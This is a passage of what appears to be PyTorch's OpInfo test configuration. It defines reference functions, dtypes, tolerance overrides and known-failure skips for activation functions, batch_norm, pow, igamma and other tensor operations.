torch.float16: tol(atol=1e-03, rtol=1.2e-03), torch.bfloat16: tol(atol=1e-03, rtol=1.2e-03) }), 'TestUnaryUfuncs', device_type='cuda', ),), skips=( # lambda impl DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # In-place operations do not play well with forward AD # https://github.com/pytorch/pytorch/issues/77447 DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_inplace_forward_mode_AD'), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'),)), UnaryUfuncInfo( 'nn.functional.selu', ref=lambda x, inplace=False: 1.0507009873554804934193349852946 * ( np.maximum(0., x) + np.minimum(0., 1.6732632423543772848170429916717 * (np.exp(x) - 1)) ), dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_forward_ad=True, # depends on 'elu' supports_fwgrad_bwgrad=True, supports_autograd=True, assert_autodiffed=False, supports_gradgrad=True, supports_out=False, inplace_variant=lambda x: torch.nn.functional.selu(x, inplace=True), decorators=[ # Not implemented yet (depends on 'elu_') DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_inplace_forward_mode_AD'), DecorateInfo( toleranceOverride({ torch.float16: tol(atol=1e-2, rtol=1.8e-2), torch.bfloat16: tol(atol=1e-2, rtol=1.8e-2) }), 'TestUnaryUfuncs', device_type='cuda', ), ], ), UnaryUfuncInfo( 'nn.functional.silu', aten_backward_name='silu_backward', ref=lambda x, inplace=False: x / (1 + np.exp(-x)), dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_forward_ad=True, supports_autograd=True, supports_fwgrad_bwgrad=True, assert_autodiffed=False, supports_out=False, inplace_variant=lambda x: torch.nn.functional.silu(x, inplace=True), decorators=[ DecorateInfo( toleranceOverride({ torch.float16: tol(atol=1e-3, rtol=1e-3), torch.bfloat16: tol(atol=1e-4, rtol=1e-4) }), 'TestUnaryUfuncs', device_type='cuda', ), ], skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_normal', dtypes=(torch.cfloat,), device_type='cpu'), ) ), # TODO: combine this with the nn.functional.silu OpInfo when # complex autodiff for silu is supported or when # the forward bug is fixed # Note: silu errors when given inputs that require grad # but it doesn't support grad in their dtype # This is why the dtypes list above passes test_dtypes, # because it's getting lucky and failing in forward # because test_dtypes sets requires_grad to True # THIS IS A BUG UnaryUfuncInfo( 'nn.functional.silu', variant_test_name='complex', ref=lambda x, inplace=False: x / (1 + np.exp(-x)), dtypes=complex_types(), dtypesIfCUDA=empty_types(), supports_forward_ad=False, supports_autograd=False, assert_autodiffed=False, supports_out=False, inplace_variant=lambda x: torch.nn.functional.silu(x, inplace=True), decorators=[ DecorateInfo( toleranceOverride({ torch.float16: tol(atol=1e-3, rtol=1e-3), torch.bfloat16: tol(atol=1e-4, rtol=1e-4) }), 'TestUnaryUfuncs', device_type='cuda', ), ], skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_normal', dtypes=(torch.cfloat,), device_type='cpu'), # FIXME: intentionally misreports dtypes DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_dtypes'), # FIXME: numpy reference diverges: Comparing (nan+nanj) and (-0+0j) DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=(torch.complex64, torch.cdouble)), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', dtypes=(torch.complex64,)), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', dtypes=(torch.complex64,)))), UnaryUfuncInfo( 'nn.functional.hardsigmoid', aten_backward_name='hardsigmoid_backward', ref=reference_hardsigmoid, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_autograd=True, assert_autodiffed=False, supports_gradgrad=False, supports_forward_ad=True, supports_out=False, inplace_variant=partial(torch.nn.functional.hardsigmoid, inplace=True), decorators=[ DecorateInfo( toleranceOverride({torch.float16: tol(atol=1e-04, rtol=0.001)}), 'TestUnaryUfuncs', device_type='cuda',), ], skips=[ # still want to test that first derivative works though second derivative isn't supported DecorateInfo(unittest.expectedFailure, 'TestGradients', "test_inplace_gradgrad"), # produces 0 instead of nan on ROCM DecorateInfo(unittest.expectedFailure, 'TestUnaryUfuncs', "test_reference_numerics_extremal", device_type='cuda', active_if=(TEST_WITH_ROCM)), ] ), UnaryUfuncInfo( 'nn.functional.logsigmoid', aten_name="log_sigmoid", aten_backward_name='log_sigmoid_backward', ref=reference_logsigmoid, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16), supports_autograd=True, assert_autodiffed=False, supports_forward_ad=True, supports_gradgrad=True, # autodiff_nonfusible_nodes=["aten::log_sigmoid"], decorators=[ DecorateInfo( precisionOverride({torch.float16: 1e-2, torch.bfloat16: 5e-3}), 'TestUnaryUfuncs', 'test_reference_numerics_small'), DecorateInfo( precisionOverride({torch.float16: 1e-2, torch.bfloat16: 5e-3}), 'TestUnaryUfuncs', 'test_reference_numerics_large'), DecorateInfo( precisionOverride({torch.float16: 1e-2, torch.bfloat16: 5e-3}), 'TestUnaryUfuncs', 'test_reference_numerics_extremal'), ], skips=( # Resized a non-empty tensor but did not warn about it. DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out_warning', device_type='cpu'), ), ), UnaryUfuncInfo( 'nn.functional.mish', aten_backward_name='mish_backward', ref=lambda x: x * np.tanh(reference_softplus(x)), dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_autograd=True, assert_autodiffed=False, supports_gradgrad=True, supports_out=False, inplace_variant=partial(torch.nn.functional.mish, inplace=True), decorators=[ DecorateInfo( toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-03)}), 'TestUnaryUfuncs', device_type='cuda',), ], ), UnaryUfuncInfo( 'nn.functional.softsign', ref=lambda x: x / (np.abs(x) + 1), dtypes=all_types_and_complex_and(torch.float16, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.float16, torch.bfloat16, torch.bool), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_autograd=True, assert_autodiffed=False, supports_gradgrad=True, supports_out=False, decorators=[ DecorateInfo( toleranceOverride({torch.float16: tol(atol=1e-03, rtol=1.3e-04)}), 'TestUnaryUfuncs',), ], skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', dtypes=(torch.int, torch.int8)), DecorateInfo(unittest.expectedFailure, 'TestGradients', "test_fn_fwgrad_bwgrad", dtypes=(torch.complex128,)), # pytorch computes (0+nanj), numpy computes (-5e-18-1j) for input (-501.-1.0000e+20j) DecorateInfo(unittest.expectedFailure, 'TestUnaryUfuncs', "test_reference_numerics_large", dtypes=(torch.complex64,)),), ), UnaryUfuncInfo( 'nn.functional.tanhshrink', ref=lambda x: x - np.tanh(x), dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.float16, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_autograd=True, assert_autodiffed=False, supports_gradgrad=True, supports_out=False, decorators=[ DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_normal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo( toleranceOverride({torch.bfloat16: tol(atol=1e-02, rtol=1.6e-02)}), 'TestUnaryUfuncs',), DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness'), ], skips=( # in each case, pytorch will produce a nan while numpy will not DecorateInfo(unittest.expectedFailure, 'TestUnaryUfuncs', "test_reference_numerics_small", dtypes=(torch.complex64, torch.complex128), active_if=(IS_MACOS)), DecorateInfo(unittest.skip("Fails on some jobs works on others!"), 'TestUnaryUfuncs', "test_reference_numerics_large", dtypes=(torch.complex64, torch.complex128), active_if=(IS_MACOS)), DecorateInfo(unittest.skip("Fails on some jobs works on others!"), 'TestUnaryUfuncs', "test_reference_numerics_extremal", dtypes=(torch.complex64, torch.complex128), device_type='cpu', active_if=(IS_MACOS or IS_WINDOWS)), ), ), OpInfo( 'nn.functional.threshold', aten_backward_name='threshold_backward', ref=lambda x, threshold, value: np.where(x > threshold, x, value).astype(x.dtype), dtypes=all_types_and(torch.bfloat16), dtypesIfCUDA=all_types_and(torch.float16, torch.bfloat16), supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_autodiffed=False, supports_gradgrad=True, supports_out=False, sample_inputs_func=sample_inputs_threshold, ), OpInfo( "nn.functional.triplet_margin_loss", sample_inputs_func=sample_inputs_triplet_margin_loss, dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, ), OpInfo( "nn.functional.triplet_margin_with_distance_loss", sample_inputs_func=partial(sample_inputs_triplet_margin_loss, with_distance=True), dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # This test cannot handle a callable passed to `distance_function`. If we would use # `distance_function=None`, the test would pass fine. DecorateInfo( unittest.expectedFailure, "TestJit", "test_variant_consistency_jit", ), DecorateInfo( unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive", ), ), ), BinaryUfuncInfo('nextafter', dtypes=floating_types_and(torch.bfloat16), supports_autograd=False, supports_rhs_python_scalar=False), OpInfo('topk', dtypes=all_types_and(torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bfloat16, torch.float16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_jit_shape_analysis=True, sample_inputs_func=sample_inputs_topk), # Multiple variants for batch_norm to test with and without cuDNN disabled # See https://github.com/pytorch/pytorch/pull/63218#discussion_r688549391 for more details OpInfo('nn.functional.batch_norm', aten_name='batch_norm', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, assert_jit_shape_analysis=True, sample_inputs_func=sample_inputs_batch_norm, skips=( # see https://github.com/pytorch/pytorch/issues/71286 DecorateInfo(unittest.expectedFailure, 'TestNNCOpInfo', 'test_nnc_correctness'), DecorateInfo(unittest.skip('Skipped!'), 'TestNNCOpInfo', 'test_nnc_correctness', device_type='cpu', dtypes=(torch.bfloat16,)), # see https://github.com/pytorch/pytorch/issues/76283 DecorateInfo(unittest.skip("Fails on UBSAN!"), 'TestCompositeCompliance', 'test_forward_ad', device_type="cpu"), # Trying to use forward AD with miopen_batch_norm that does not support it # because it has not been implemented yet. DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad', device_type="cuda", active_if=TEST_WITH_ROCM), DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness'), )), # This variant tests batch_norm with cuDNN disabled only on CUDA devices OpInfo('nn.functional.batch_norm', variant_test_name='without_cudnn', aten_name='batch_norm', dtypes=empty_types(), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, decorators=[onlyCUDA, disablecuDNN], skips=( DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad', device_type='cpu'), DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness'), ), sample_inputs_func=sample_inputs_batch_norm), OpInfo( "nn.functional.binary_cross_entropy", aten_backward_name='binary_cross_entropy_backward', sample_inputs_func=sample_inputs_binary_cross_entropy, dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_out=False, gradcheck_fast_mode=False, supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=( # RuntimeError: expected int at position 0, but got: Tensor DecorateInfo( unittest.skip("Skipped!"), "TestCudaFuserOpInfo", ), # RuntimeError: expected int at position 0, but got: Tensor DecorateInfo( unittest.skip("Skipped!"), "TestNNCOpInfo", "test_nnc_correctness", ), DecorateInfo( toleranceOverride({torch.float32: tol(atol=1e-3, rtol=1e-3)}), "TestJit", "test_variant_consistency_jit", ), ), skips=( # RuntimeError: expected int at position 0, but got: Tensor DecorateInfo( unittest.expectedFailure, "TestJit", "test_variant_consistency_jit", ), ), ), # We have to add 2 OpInfo entry for `igamma` and `igammac`.First is the # standard entry, second is to run gradcheck tests on the second argument. BinaryUfuncInfo('igamma', dtypes=floating_types_and(torch.bfloat16, torch.float16), aliases=('torch.special.gammainc',), dtypesIfCUDA=floating_types(), # TODO: FIXME supports_rhs_python_scalar=False, supports_autograd=False, skips=( # FIXME: incorrectly tries to pass a rhs scalar DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_jit_alias_remapping'), )), # TODO: FIXME, ideally by implemented grad for both inputs # BinaryUfuncInfo('igamma', # variant_test_name='grad_other', # # Since autograd formula is implemented only for other and # # gradcheck test verifies the formula for input in SampleInput, # # we permute the arguments. # op=lambda self, other, **kwargs: torch.igamma(other, self, **kwargs), # inplace_variant=None, # method_variant=None, # supports_rhs_python_scalar=False, # rhs_make_tensor_kwargs=dict(requires_grad=False), # dtypes=floating_types_and(torch.bfloat16, torch.float16), # backward_dtypesIfCPU=floating_types_and(torch.bfloat16), # dtypesIfCUDA=floating_types(), # backward_dtypesIfCUDA=floating_types(), # supports_inplace_autograd=False, # skips=( # # Derivative wrt first tensor not implemented # DecorateInfo(unittest.expectedFailure, "TestCommon", # "test_floating_inputs_are_differentiable"),"), # # test does not work with passing lambda for op # # AssertionError: False is not true : Tensors failed to compare as equal! # DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), # # test fails are we permute the arguments function variant # # but not for inplace or method. # DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager'), # # TypeError: igamma(): argument 'input' (position 1) must be Tensor, not float # DecorateInfo(unittest.skip('Skipped!'), 'TestBinaryUfuncs'), # )), BinaryUfuncInfo('igammac', dtypes=floating_types_and(torch.bfloat16, torch.float16), aliases=('torch.special.gammaincc',), dtypesIfCUDA=floating_types(), supports_autograd=False, supports_rhs_python_scalar=False, skips=( # FIXME: incorrectly tries to pass a rhs scalar DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_jit_alias_remapping'), )), # TODO: FIXME, ideally by implementing grad for both inputs # BinaryUfuncInfo('igammac', # variant_test_name='grad_other', # # Since autograd formula is implemented only for other and # # gradcheck test verifies the formula for input in SampleInput, # # we permute the arguments # op=lambda self, other, **kwargs: torch.igammac(other, self, **kwargs), # inplace_variant=None, # method_variant=None, # supports_rhs_python_scalar=False, # rhs_make_tensor_kwargs=dict(requires_grad=False), # dtypes=floating_types_and(torch.bfloat16, torch.float16), # backward_dtypesIfCPU=floating_types_and(torch.bfloat16), # dtypesIfCUDA=floating_types(), # backward_dtypesIfCUDA=floating_types(), # supports_inplace_autograd=False, # decorators=[ # # Derivative wrt first tensor not implemented # DecorateInfo(unittest.expectedFailure, "TestCommon", # "test_floating_inputs_are_differentiable"), # ], # skips=( # # test does not work with passing lambda for op # # AssertionError: False is not true : Tensors failed to compare as equal! # DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), # # test fails are we permute the arguments function variant # # but not for inplace or method. # DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager'), # # TypeError: igammac(): argument 'input' (position 1) must be Tensor, not float # DecorateInfo(unittest.skip('Skipped!'), 'TestBinaryUfuncs'), # )), OpInfo('nn.functional.softshrink', aten_name="softshrink", aten_backward_name='softshrink_backward', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_autodiffed=False, sample_inputs_func=sample_inputs_softshrink_hardshrink_hardtanh, supports_gradgrad=True, ), OpInfo('nn.functional.hardshrink', aten_name="hardshrink", aten_backward_name='hardshrink_backward', dtypes=floating_types_and(torch.bfloat16,), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_autograd=True, assert_autodiffed=True, sample_inputs_func=sample_inputs_softshrink_hardshrink_hardtanh, supports_gradgrad=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, autodiff_nonfusible_nodes=["aten::hardshrink"]), OpInfo('nn.functional.hardtanh', aten_name="hardtanh", aten_backward_name='hardtanh_backward', dtypes=floating_types_and(torch.int8, torch.int16, torch.int32, torch.int64, torch.bfloat16), backward_dtypes=all_types(), dtypesIfCUDA=floating_types_and(torch.int8, torch.int16, torch.int32, torch.int64, torch.float16, torch.bfloat16), backward_dtypesIfCUDA=floating_types_and(torch.float16), supports_autograd=True, assert_autodiffed=True, sample_inputs_func=sample_inputs_softshrink_hardshrink_hardtanh, supports_gradgrad=True, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, autodiff_nonfusible_nodes=["aten::hardtanh"], ), OpInfo('nn.functional.gelu', aten_name="gelu", aten_backward_name='gelu_backward', ref=reference_gelu if TEST_SCIPY else _NOTHING, supports_autograd=True, assert_autodiffed=True, sample_inputs_func=sample_inputs_gelu, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), supports_gradgrad=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, autodiff_nonfusible_nodes=["aten::gelu"], skips=( # AssertionError: Tensor-likes are not close! # May not replicate in CI DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out'),)), OpInfo('nn.functional.relu6', aten_name="relu6", dtypes=all_types_and(torch.bfloat16), backward_dtypes=floating_types(), dtypesIfCUDA=all_types_and(torch.float16, torch.bfloat16), backward_dtypesIfCUDA=floating_types_and(torch.float16), supports_autograd=True, assert_autodiffed=True, sample_inputs_func=sample_inputs_softshrink_hardshrink_hardtanh, supports_gradgrad=True, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, autodiff_nonfusible_nodes=["aten::relu6"]), OpInfo('mm', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_mm), OpInfo('mode', op=torch.mode, dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # Resized a non-empty tensor but did not warn about it DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out_warning'), ), sample_inputs_func=sample_inputs_mode,), MvlGammaInfo(variant_test_name='mvlgamma_p_1', domain=(1, None), skips=skips_mvlgamma() + \ (DecorateInfo(unittest.expectedFailure, 'TestUnaryUfuncs', 'test_reference_numerics_extremal'), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=(torch.float16, torch.int8)), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', dtypes=(torch.int8,)),), sample_kwargs=lambda device, dtype, input: ({'p': 1}, {'d': 1})), MvlGammaInfo(variant_test_name='mvlgamma_p_3', domain=(2, None), skips=skips_mvlgamma(skip_redundant=True) + ( DecorateInfo(unittest.expectedFailure, 'TestUnaryUfuncs', 'test_reference_numerics_extremal'), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=(torch.float16, torch.int8)), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', dtypes=(torch.int8,)), ), sample_kwargs=lambda device, dtype, input: ({'p': 3}, {'d': 3})), MvlGammaInfo(variant_test_name='mvlgamma_p_5', domain=(3, None), skips=skips_mvlgamma(skip_redundant=True) + ( DecorateInfo(unittest.expectedFailure, 'TestUnaryUfuncs', 'test_reference_numerics_extremal'), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=(torch.float16, torch.int8)), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', dtypes=(torch.int8,)), ), sample_kwargs=lambda device, dtype, input: ({'p': 5}, {'d': 5})), BinaryUfuncInfo('ne', ref=np.not_equal, aliases=('not_equal',), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16), always_returns_bool=True, supports_autograd=False), OpInfo('narrow', dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_narrow), UnaryUfuncInfo('neg', aliases=('negative', ), ref=np.negative, dtypes=all_types_and_complex_and(torch.half, torch.bfloat16, torch.chalf), error_inputs_func=error_inputs_neg, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, assert_autodiffed=True, skips=( # RuntimeError: "nonzero_count_cpu" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_consistency', dtypes=(torch.chalf,),), # RuntimeError: "nonzero_count_cpu" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_unary_inplace', dtypes=(torch.chalf,),), # RuntimeError: "nonzero_count_cpu" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_unary_out', dtypes=(torch.chalf,),), # RuntimeError: "add_out_op2_sparse_csr" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_zero_to_zero_correspondence_unary', dtypes=(torch.chalf,),) )), OpInfo('dist', op=torch.dist, dtypes=floating_and_complex_types_and(torch.half, torch.bfloat16), supports_out=False, supports_forward_ad=True, # torch.autograd.gradcheck.GradcheckError: While computing batched gradients, got: # Could not allocate memory to change Tensor SizesAndStrides! check_batched_forward_grad=False, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_dist), OpInfo('outer', op=torch.outer, aliases=('ger', ), dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_outer,), OpInfo('ormqr', op=torch.ormqr, dtypes=floating_and_complex_types(), supports_autograd=False, sample_inputs_func=sample_inputs_ormqr, error_inputs_func=error_inputs_ormqr, decorators=[skipCUDAIfNoCusolver, skipCPUIfNoLapack], skips=( # ormqr does not support forward when complex inputs require grad DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_dtypes'), # Strides are not the same! DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), )), OpInfo('permute', ref=np.transpose, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), supports_out=False, assert_autodiffed=True, autodiff_fusible_nodes=[], # aliases inputs, shouldn't be fused autodiff_nonfusible_nodes=[], # aliases inputs, shouldn't be fused assert_jit_shape_analysis=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_permute, reference_inputs_func=reference_inputs_permute), BinaryUfuncInfo('pow', dtypes=all_types_and_complex_and(torch.half, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.half, torch.bfloat16, torch.chalf), ref=np.power, # Due to AVX2 curently not being fully supported for Float16, log_vml_cpu can't be enabled # for Float16, causing this test to fail. pow's autograd for Float16 is thus currently # unsupported on CPU. backward_dtypes=floating_and_complex_types_and(torch.bfloat16), backward_dtypesIfCUDA=floating_and_complex_types_and(torch.bfloat16, torch.half, torch.chalf), supports_inplace_autograd=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_autodiffed=True, supports_one_python_scalar=True, # Integer types do not support negative exponentes rhs_make_tensor_kwargs=dict(low=0), # Raising negative real numbers to fractional powers is not supported lhs_make_tensor_kwargs=dict(low=0), decorators=( DecorateInfo(toleranceOverride({torch.complex64: tol(atol=1e-4, rtol=1.3e-05)}), 'TestBinaryUfuncs', 'test_reference_numerics'), DecorateInfo(toleranceOverride({torch.complex64: tol(atol=1e-4, rtol=1.3e-05), torch.complex128: tol(atol=1e-4, rtol=1.3e-05)}), 'TestBinaryUfuncs', 'test_scalar_support'), ), skips=( # Skipping integers because they are being raised to negative powers causing an error DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_reference_numerics_small_values', dtypes=[torch.int8, torch.int16, torch.int32, torch.int64]), DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_reference_numerics_large_values', dtypes=[torch.int16, torch.int32, torch.int64]), # FIXME Complex values error with: Greatest absolute difference: nan at index # Ref: https://github.com/pytorch/pytorch/issues/76853 # For `chalf`, reference computation in `numpy` is computed in `cfloat`. # Output of `chalf` saturates to `inf` quicker than reference due to its small range # which leads to failure of this test. DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_reference_numerics', dtypes=(torch.complex32,)), DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_reference_numerics_small_values', dtypes=(torch.complex32, torch.complex64, torch.complex128)), DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_reference_numerics_large_values', dtypes=(torch.complex32, torch.complex64, torch.complex128)), DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_reference_numerics_extremal_values', dtypes=(torch.complex32, torch.complex64, torch.complex128)), )), BinaryUfuncInfo('float_power', ref=np.float_power, dtypes=all_types_and_complex_and(torch.half, torch.bfloat16, torch.bool), promotes_int_to_float=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_one_python_scalar=True, # Integer types do not support negative exponentes rhs_make_tensor_kwargs=dict(low=0), # Raising negative real numbers to fractional powers is not supported lhs_make_tensor_kwargs=dict(low=0), decorators=( DecorateInfo(toleranceOverride({torch.complex64: tol(atol=1e-4, rtol=1.3e-05), torch.complex128: tol(atol=1e-4, rtol=1.3e-05)}), 'TestBinaryUfuncs', 'test_scalar_support'), ), skips=( # FIXME # AssertionError: Object comparison failed: torch.float64 != torch.float32 DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_type_promotion'), # -3.43399e+38 is outside the range of representable values of type 'float' DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), # Complex values error with: Greatest absolute difference: nan at index DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_reference_numerics_small_values', dtypes=[torch.complex64, torch.complex128]), DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_reference_numerics_large_values', dtypes=[torch.complex64, torch.complex128]), DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_reference_numerics_extremal_values', dtypes=[torch.complex64, torch.complex128]), )), OpInfo('qr', op=torch.qr, dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_linalg_qr_geqrf, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # In-place ops check_batched_gradgrad=False, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack]), UnaryUfuncInfo('rad2deg', ref=np.degrees, decorators=(precisionOverride({torch.bfloat16: 7e-1, torch.float16: 7e-1}),), dtypes=all_types_and(torch.bool, torch.half, torch.bfloat16), skips=( # Reference: https://github.com/pytorch/pytorch/pull/51283#issuecomment-770614273 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', dtypes=[torch.bfloat16]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=[torch.bfloat16]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', dtypes=[torch.bfloat16]), ), supports_forward_ad=True, supports_fwgrad_bwgrad=True), UnaryUfuncInfo('real', ref=np.real, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.half, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # See https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, skips=( # Skip since real and imag don't have out variants. DecorateInfo(unittest.expectedFailure, 'TestUnaryUfuncs', 'test_out_arg_all_dtypes'), )), OpInfo( "roll", ref=np.roll, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.half), error_inputs_func=error_inputs_roll, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_roll, decorators=(onlyNativeDeviceTypes,), ), OpInfo( "rot90", dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.half), error_inputs_func=error_inputs_rot90, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_rot90, ), # To test reference numerics against multiple values of argument `decimals`, # we make multiple OpInfo entries with each entry corresponding to different value of decimals. UnaryUfuncInfo('round', ref=np.round, aliases=('special.round',), dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, 